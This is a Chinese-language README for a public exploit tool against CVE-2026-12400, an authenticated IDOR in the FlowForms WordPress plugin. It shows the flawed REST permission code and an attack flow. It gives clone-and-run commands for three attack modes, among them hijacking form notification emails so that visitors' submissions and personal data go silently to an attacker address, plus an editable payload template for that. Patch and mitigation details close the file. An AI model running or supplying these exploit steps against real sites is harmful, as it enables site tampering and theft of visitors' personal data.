已认证(贡献者+)的不安全直接对象引用,导致FlowForms ≤ 1.1.1 中任意表单可被修改
| 属性 | 值 |
|---|---|
| CVE ID | CVE-2026-12400 |
| CVSS 评分 | 4.3 — 中等 |
| CVSS 向量 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N |
| CWE | CWE-639(通过用户控制密钥绕过授权) |
| 产品 | FlowForms — WordPress 对话式表单构建器插件 |
| 受影响版本 | 所有版本,包括 1.1.1 |
| 修复版本 | 在 1.1.2 中修复 |
| 研究人员 | Phantom Hat |
完整的白盒案例研究,包含源代码分析、输入流跟踪和补丁对比:
FlowForms 在 flowforms/v1 命名空间下暴露了两个存在漏洞的 REST API 端点:
POST /index.php?rest_route=/flowforms/v1/forms/{id}
POST /index.php?rest_route=/flowforms/v1/forms/{id}/settings
两者都接受用户控制的 {id} 参数(位于 URL 路径中)并修改目标表单的数据——名称、内容、布局、重定向 URL 以及邮件通知收件人。
两个有漏洞的路由注册使用了相同的缺陷 permission_callback:
// 更新表单内容/名称
register_rest_route($ns, '/forms/(?P<id>\d+)', [
'methods' => WP_REST_Server::EDITABLE,
'callback' => [$this, 'update_form'],
'permission_callback' => fn() => current_user_can('edit_posts'),
]);
// 更新表单设置(邮件通知、布局等)
register_rest_route($ns, '/forms/(?P<id>\d+)/settings', [
'methods' => WP_REST_Server::EDITABLE,
'callback' => [$this, 'update_settings'],
'permission_callback' => fn() => current_user_can('edit_posts'),
]);
edit_posts 是 贡献者 拥有的能力。{id} 参数从未检查与请求用户的所属关系——任何已认证用户都可以针对站点上的任何表单 ID。
攻击者 (贡献者) FlowForms REST API
│ │
│── POST /wp-login.php ────────────>│ (1) 以贡献者身份认证
│<─ wordpress_logged_in cookie ─────│
│ │
│── GET /wp-admin/post-new.php ────>│ (2) 收集 REST nonce
│<─ wpApiSettings.nonce ────────────│
│ │
│── GET /flowform/{id} ────────────>│ (3) 枚举已发布的表单
│<─ HTTP 200 ───────────────────────│ (任何可访问的表单都是目标)
│ │
│── POST /flowforms/v1/forms/{id} │ (4a) 覆盖表单名称/内容
│ 携带攻击载荷 ──────────────>│ ← 未检查所有权
│<─ { "success": true } ────────────│
│ │
│── POST /flowforms/v1/forms/{id} │ (4b) 劫持邮件通知
│ /settings ─────────────────>│ ← 攻击者将收到所有
│<─ { "success": true } ────────────│ 未来的表单提交
│ │
│ 所有 3 个攻击向量均已确认 │ (5) 名称 ✔ 内容 ✔ 邮件 ✔
| 模式 | 端点 | 影响 |
|---|---|---|
name | /forms/{id} | 重命名任意表单——破坏、社会工程攻击 |
content | /forms/{id} | 覆盖布局、欢迎/感谢页面、重定向 URL |
email | /forms/{id}/settings | 劫持通知邮件——静默接收所有表单提交 |
email 模式最为关键。劫持后,受害者联系表单的每次提交——包括访客的个人身份信息、消息和联系方式——都会静默转发到攻击者控制的地址。站点管理员看不到任何变化。
Contributor 角色的已认证账户git clone https://github.com/0x00phantom-hat/CVE-2026-12400-Exploit.git
cd CVE-2026-12400-FlowForms-IDOR-Exploit
pip install -r requirements.txt
将任意表单重命名为攻击者控制的内容:
python3 exploit.py \
-u http://TARGET \
--user contributor \
--password password123 \
-i 1 -n 100 \
--exploit name
覆盖表单布局、页面、重定向 URL 和背景图片:
python3 exploit.py \
-u http://TARGET \
--user contributor \
--password password123 \
-i 1 -n 100 \
--exploit content
将所有未来的表单提交通知重定向到攻击者控制的地址:
python3 exploit.py \
-u http://TARGET \
--user contributor \
--password password123 \
-i 1 -n 100 \
--exploit email
python3 exploit.py \
-u http://TARGET \
-p http://127.0.0.1:8080 \
--user contributor \
--password password123 \
-i 1 -n 100 \
--exploit email
| 标志 | 短名 | 描述 | 必需 |
|---|---|---|---|
--url | -u | 目标 WordPress URL | ✅ |
--user | WordPress 用户名 (Contributor+) | ✅ | |
--password | WordPress 密码 | ✅ | |
--id-start | -i | 枚举起始表单 ID | ✅ |
--num-forms | -n | 要枚举的表单 ID 数量 | ✅ |
--exploit | 攻击模式:name / content / email | ✅ | |
--proxy | -p | 代理 URL (例如 http://127.0.0.1:8080) | ❌ |
JSON 载荷模板 (NAME_EDIT、CONTENT_EDIT、EMAIL_EDIT) 定义在脚本顶部。在运行前编辑它们以自定义攻击内容——更改通知邮件地址、重定向 URL、背景图片、表单标题等。
# exploit.py 顶部
EMAIL_EDIT = json.loads("""{
"settings": {
"email": {
"enabled": true,
"notifications": {
"1": {
"email": "[email protected]", # ← 修改此处
...
}
}
}
}
}""")
该利用工具执行三个自动化步骤:
步骤 1 — 认证
以攻击者身份(贡献者)登录,并从 wp-admin/post-new.php 收集有效的 REST API nonce。
步骤 2 — 枚举表单
在指定的 ID 范围内扫描 GET /flowform/{id}。返回 HTTP 200 的 ID 被收集为可访问的目标——这些是站点上任何用户(包括管理员)的已发布表单。
步骤 3 — 利用 根据所选模式,将对应的载荷发送到未受保护的 REST 端点:
name / content → POST /flowforms/v1/forms/{id}email → POST /flowforms/v1/forms/{id}/settings服务器接受请求并应用修改,无需检查所有权。
| 措施 | 详情 |
|---|---|
| 打补丁 | 将两个端点上通用的 edit_posts 检查替换为 current_user_can('edit_post', $form_id)——将能力检查绑定到特定的文章对象,从而强制执行 WordPress 的所有权规则 |
| 缓解 | 在打补丁之前,如果插件处于激活状态,请限制 Contributor 和 Author 角色 |
// 有漏洞——两个端点
'permission_callback' => fn() => current_user_can('edit_posts'),
// 安全(已修复)
private function can_edit_form($form_id) {
return current_user_can('edit_post', $form_id);
}
'permission_callback' => fn($request) => $this->can_edit_form(absint($request['id'])),
CVE-2026-12400-FlowForms-IDOR-Exploit/
├── exploit.py # 精简利用工具,提供丰富 UI(3 种模式)
├── requirements.txt # Python 依赖
└── README.md # 本文件